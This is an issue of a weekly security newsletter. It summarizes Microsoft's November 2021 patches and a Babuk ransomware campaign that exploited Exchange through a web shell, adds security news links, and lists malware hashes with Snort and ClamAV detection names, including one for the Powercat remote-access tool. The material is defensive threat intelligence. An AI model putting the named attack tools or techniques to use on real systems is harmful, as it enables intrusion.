@RISK Newsletter for November 04, 2021
The consensus security vulnerability alert.
Vol. 21, Num. 44
This is a weekly newsletter that provides in-depth analysis of the latest vulnerabilities with straightforward remediation advice. Qualys supplies a large part of the newly-discovered vulnerability content used in this newsletter.
Archived issues may be found at the SANS @RISK Newletter Archive.
CONTENTS:
NOTABLE RECENT SECURITY ISSUES
INTERESTING NEWS FROM AROUND THE SECURITY COMMUNITY
MOST PREVALENT MALWARE FILES November 4-11, 2021
TOP VULNERABILITY THIS WEEK: Microsoft patches six critical vulnerabilities in monthly security update
NOTABLE RECENT SECURITY ISSUES
SELECTED BY THE TALOS SECURITY INTELLIGENCE AND RESEARCH GROUP
Title: Microsoft discloses 56 vulnerabilities, including one Excel issue exploited in the wild
Description: Microsoft released its monthly security update Tuesday, disclosing 56 vulnerabilities in the company’s various software, hardware and firmware offerings, including one that’s actively being exploited in the wild. November’s security update features six critical vulnerabilities, up from last month’s two, which was far lower than average for Microsoft. The other 49 vulnerabilities fixed today are considered “important.” CVE-2021-42292 is one of those vulnerabilities considered “important” and not critical, though it is the only one included in this security update that Microsoft reports has been actively exploited in the wild. An attacker could exploit this vulnerability in Microsoft Excel to bypass certain security settings on targeted machines. In a time when email attachments are the major vector of system compromise, this vulnerability can be used to increase the efficiency of these attacks by avoiding a security prompt and consequently reducing the social engineering necessary to infect the victim.
Reference: https://blog.talosintelligence.com/2021/11/microsoft-patch-tuesday-for-nov-2021.html
Snort SIDs: 58519, 58520, 58539 – 58541
Snort 3 SID: 300054
Title: Microsoft Exchange vulnerabilities exploited once again for ransomware, this time with Babuk
Description: Cisco Talos recently discovered a malicious campaign deploying variants of the Babuk ransomware predominantly affecting users in the U.S. with smaller number of infections in U.K., Germany, Ukraine, Finland, Brazil, Honduras and Thailand. The actor of the campaign is sometimes referred to as Tortilla, based on the payload file names used in the campaign. This is a new actor operating since July 2021. Prior to this ransomware, Tortilla has been experimenting with other payloads, such as the PowerShell-based netcat clone Powercat, which is known to provide attackers with unauthorized access to Windows machines. We assess with moderate confidence that the initial infection vector is exploitation of ProxyShell vulnerabilities in Microsoft Exchange Server through the deployment of China Chopper web shell.
Reference: https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html
ClamAV signatures: Win.Ransomware.Packer-7473772-1, Win.Trojan.Swrort-5710536-0, Win.Trojan.Powercat-9840812-0, Win.Trojan.Swrort-9902494-0, Win.Exploit.PetitPotam-9902441-0, Win.Trojan.MSILAgent-9904224-0, Win.Malware.Agent-9904986-0, Win.Malware.Agent-9904987-0, Win.Malware.Agent-9904988-0, Win.Malware.Agent-9904989-0, Win.Malware.Agent-9904990-0, Win.Downloader.DarkTortilla-9904993-0, Win.Trojan.DarkTortilla-9904994-0
INTERESTING NEWS FROM AROUND THE SECURITY COMMUNITY
Congress passed a major infrastructure improvement bill that includes $1 billion in funds to improve the U.S.’s cybersecurity posture and upgrade critical infrastructure.
https://thehill.com/policy/cybersecurity/580649-state-and-local-officials-celebrate-passage-of-infrastructure-bill-with
The Biden administration is also ordering federal agencies to patch hundreds of high-profile cybersecurity vulnerabilities, some dating back to 2017.
https://thehill.com/policy/cybersecurity/579801-federal-agencies-ordered-to-patch-hundreds-of-vulnerabilities
Mobile devices belonging to six Palestinian human rights activists were found to be compromised with the NSO Group’s Pegasus spyware.
https://www.theguardian.com/world/2021/nov/08/palestinian-activists-mobile-phones-hacked-by-nso-says-report
The U.S. charged one Ukrainian and one Russian for their involvement with the REvil ransomware gang. The State Department is also offering up to $10 million in rewards for any information on the threat group’s leaders.
https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/
Cybersecurity experts hope the arrests can make a tangible change to the threat landscape after years of threats to ransomware actors.
https://www.wired.com/story/ransomware-revil-arrest-kaseya/
U.S. defense contractor Electronic Warfare Associates disclosed a recent data breach this week, warning that attackers stole files containing sensitive information.
https://www.bleepingcomputer.com/news/security/us-defense-contractor-electronic-warfare-hit-by-data-breach/
Many federal agencies are likely to miss a deadline this week to enable multi-factor authentication to log into their networks.
https://www.cyberscoop.com/mfa-encryption-executive-order/
Security researchers discovered a new initial access broker that may be working with several ransomware groups, including StrongPity and Phobos.
https://blogs.blackberry.com/en/2021/11/zebra2104
Popular stock trading app Robinhood disclosed a data breach affecting 7 million users.
https://finance.yahoo.com/news/why-310-robinhoods-7-million-054515371.html
MOST PREVALENT MALWARE FILES November 4-11, 2021
COMPILED BY TALOS SECURITY INTELLIGENCE AND RESEARCH GROUP
SHA 256: 5bab2ae1cada90f37b821e4803912c5b351fda417bbf0a9c768b715c6d492e13
MD5: a6a7eb61172f8d988e47322ebf27bf6d
VirusTotal: https://www.virustotal.com/gui/file/5bab2ae1cada90f37b821e4803912c5b351fda417bbf0a9c768b715c6d492e13/details
Typical Filename: wx.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Wingo::in07.talos
SHA 256: e5044d5ac2f8ea3090c2460a5f7d92a5a49e7fa040bf26659ec2f7c442dda762
MD5: 6ea750c9d69b7db6532d90ac0960e212
VirusTotal: https://www.virustotal.com/gui/file/e5044d5ac2f8ea3090c2460a5f7d92a5a49e7fa040bf26659ec2f7c442dda762/details
Typical Filename: deps.zip
Claimed Product: N/A
Detection Name: Auto.E5044D5AC2.242358.in07.Talos
SHA 256: 4d47791970c9e4b829ef0cc0049eecdfae3655f87a1e79620bbcc39eb8c21c8b
MD5: fdcdb2db7d4f9cb8b463ea2e8272d175
VirusTotal: https://www.virustotal.com/gui/file/4d47791970c9e4b829ef0cc0049eecdfae3655f87a1e79620bbcc39eb8c21c8b/details
Typical Filename: javarx2.dat
Claimed Product: N/A
Detection Name: Auto.4D47791970.232152.in07.Talos
SHA 256: 8b4216a7c50599b11241876ada8ae6f07b48f1abe6590c2440004ea4db5becc9
MD5: 34560233e751b7e95f155b6f61e7419a
VirusTotal: https://www.virustotal.com/gui/file/8b4216a7c50599b11241876ada8ae6f07b48f1abe6590c2440004ea4db5becc9/details
Typical Filename: SAntivirusService.exe
Claimed Product: A n t i v i r u s S e r v i c e
Detection Name: PUA.Win.Dropper.Segurazo::tpd
SHA 256: 1487f122c92f3bade35e03b6b0554a80b1563f2c167d9064263845653d912ec6
MD5: ee62e8f42ed70e717b2571c372e9de9a
VirusTotal: https://www.virustotal.com/gui/file/1487f122c92f3bade35e03b6b0554a80b1563f2c167d9064263845653d912ec6/details
Typical Filename: lHe
Claimed Product: N/A
Detection Name: W32.Gen:MinerDM.24ls.1201